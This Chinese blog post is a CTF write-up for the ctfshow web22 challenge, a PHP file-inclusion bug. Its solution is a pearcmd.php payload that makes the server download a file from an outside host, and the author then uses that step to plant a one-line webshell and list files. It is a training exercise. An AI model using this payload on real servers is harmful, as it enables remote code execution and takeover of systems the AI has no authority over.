ctfshow萌新计划web22

最新推荐文章于 2024-06-02 17:29:44 发布
最新推荐文章于 2024-06-02 17:29:44 发布
阅读量3k 收藏 8
点赞数 1
分类专栏: ctf 文章标签: php web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46041723/article/details/110948866
版权

ctfshow萌新计划web22

前言

上次做题,直接瞄准ctfshow萌新计划开炮,结果没打完,这次来补充一下。

正文

web22

打开题目,发现了源码

<?php
if(isset($_GET['c'])){
       $c=$_GET['c'];
       if(!preg_match("/\:|\/|\\\/i",$c)){
               include($c.".php");
       }


}else{
        highlight_file(__FILE__);
}
?>

发现相比较前面几个,过滤的少了,但是变为了include文件包含,并且把传参c.php拼接在了一起。刚拿到,就想着还是用日志包含进行后门文件上传,然后访问日志目录进入网站目录。但是可能因为是过滤了,没成功,就想着绕过过滤,然后把后面的.php文件后缀给注释掉,但是一直不成功。后来在群里问了大师傅之后,才知道这个题目的身份是www用户,无法远程访问默认日志文件。那么到这里就断了,该怎么办呢?问了大师傅之后得到了新的思路,详情还是看这篇文章
刚看了这篇文章之后,我直呼涨见识,这,,根本没听说过,好吧,是我菜了。
关于命令pearcmd&+download+http://xxx.php这个,文章里有说明,不进行过多的讲解,这里给一下自己的见解。

pear是一个是可重用的PHP组件框架和系统分发
– 为PHP用户提供开源的结构化代码库
– 便于代码的分发和包的维护
– 标准化PHP的编写代码
– 提供PHP的扩展社区库(PECL)
– 通过网站、邮件列表和下载镜像支持PHP/PEAR社区
在pear中有一个pearcmd.php的类,这里传参c值为pearcmd拼接后面的.php后缀,然后进行下一步的操作。下载文件从指定服务器

然后根据大师傅的博客,进行尝试。首先构造payload为:?c=pearcmd&+download+http://xxxxx/1emon/index.php
而对于,index.php内容是
测试
然后用构造的payload尝试,发现
结果
然后访问文件得到当前的用户信息
用户信息
那么既然成功了,接下来就用一句话进行了,直接修改文件内容为一句话木马,然后同样的方法,访问之后,在post传参,结果如下:
ls结果
grep结果
得到flag。

墨子轩、
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTFSHOW-WEB入门爆破部分(21-28)
Npceer-一位网安初学者的博客
01-28 374
0x01 web21 基础爆破 工具:burpsuite 首先打开界面是一个登录框 随便输入个admin admin然后抓包发现这一行Authorization: Basic YWRtaW46YWRtaW4=拿去解码 设置payload去爆破 下面是我的爆破方法 爆破点设置 payload1设置(我当时直接默认用户名是admin了) 由于我的爆破点设置 模式选择cluster bomb 由于用户名部分把:也加进去了 所以需要在爆破上添加后缀: 然后添加BASE64编码 记得将下方的url编码关掉 防
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
CTFshow_萌新web
果粒程
01-09 497
CTFshow_萌新web
ctfshow-web入门-爆破(web21-web24)
最新发布
Welcome To Myon'Blog !
06-02 708
(intval(substr($token, 1,1))+intval(substr($token, 14,1))+substr($token, 17,1))/substr($token, 1,1) === intval(substr($token, 31,1)) 将第 2、15 和 18 个字符转换为整数相加,再除以第 2 个字符的整数值,检查结果是否等于第 32 个字符的整数值;flag.ctf.show 页面无法访问(前面有一个查这个域名的 DNS 的 TXT信息的题也是有问题)
ctfshow 萌新22 (类似级客巅峰web4)
Firebasky的博客
10-07 3294
在之前ctfshow平台的萌新22,大家都认为是无解的,题目也介绍了"还能搞,阿呆表示将直播倒立放水"。但是在级客巅峰结束的那天晚上,群里的师傅介绍说,如果修改了php.ini里面的配置(register_argc_argv)可以做出来。最后是真的做出来了。 使用阿呆~~~? 下面是自己的思考,感谢Guoke师傅和ha1c9on师傅的帮助 一. 源代码 <?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_mat.
CTFshow 爆破 web22
Kradress的博客
10-28 316
根据提示 域名也可以爆破的,试试爆破这个ctf.show的子域名 扫到一般发现没有结果 ,这题也不能做了 直接看hint, 页面也是失效的 直接拿走flag
CTF-show WEB入门--web22
m0_73912575的博客
02-27 425
CTF-show WEB入门--web22
ctf-web刷题-ctfshow-爆破-web22
None安全团队
08-01 382
通过子域名暴力破解发现了四个域名 在vip.ctf.show网站标题中发现flag
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
CTFshow-萌新 Writeup
Atkx's Blog
05-06 3729
这里写自定义目录标题萌新_密码1萌新_密码2萌新 密码3萌新 隐写2 萌新_密码1 密文: 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 提交格式:KEY{XXXXXXXXXXXXXX} hex转字符串 m="53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D3
新BugKu-web篇-web22
jiuyongpinyin的博客
05-31 107
web22 看了提示就知道需要以GET方式传入s参数,然后就试了一下system()看看能不能直接执行系统命令,发现可以,那这道题目就变得简单起来了,先查看当前目录下的文件 然后直接cat 这个文档 得到flag payload如下: http://114.67.246.176:11188?s=system('cat flaga15808abee46a1d5.txt') 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
CTFSHOW_萌新计划web1-24
A的博客
08-19 799
随便写一下。
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1041
ctfshow-web入门-爆破wp
CTFSHOW【萌新计划】Writeup
abtgu的博客
05-16 2726
CTFSHOW【萌新计划web1【萌新计划web2【萌新计划web3【萌新计划web4【萌新计划web5【萌新计划web6【萌新计划web7【萌新计划web8【萌新计划web9【萌新计划web10【萌新计划web11 【萌新计划web1 题目: 代码很安全,没有漏洞。 解题思路: 题目代码 <html> <head> <title>ctf.show萌新计划web1</title> <meta charset="u
CTFshow_web入门_爆破
bilala的博客
08-19 1525
文章目录前言- - > web21- - > web22- - > web23- - > web24- - > web25- - > web26- - > web27- - > web28 前言 - - > web21 * 考点: intruder中的Custom iterator(自定义迭代器) 先下载题目所给的zip,解压后发现是本字典,那必须是本题要用到的字典了 打开题目,登录,抓包 将图中乱码用base64解码 发现传参格式为: 账号冒号
ctfshow web入门 爆破 21-28
m0_64815693的博客
04-05 1322
ctfshow web入门 爆破 21-28
ctfshow萌新web
09-02
ctfshow萌新web是一个CTF比赛中的题目,具体是关于web安全的。根据引用[1]和引用所提到的内容,这道题目涉及到了使用intval函数获取敏感数据的特性。在解题过程中,我们需要通过绕过某些过滤条件,使得传入的参数id可以被判断为1000,从而获取到flag。在解这道题之前,需要有一些关于web安全的基础知识准备工作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTFShow:萌新web1](https://blog.csdn.net/weixin_64089259/article/details/130144716)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值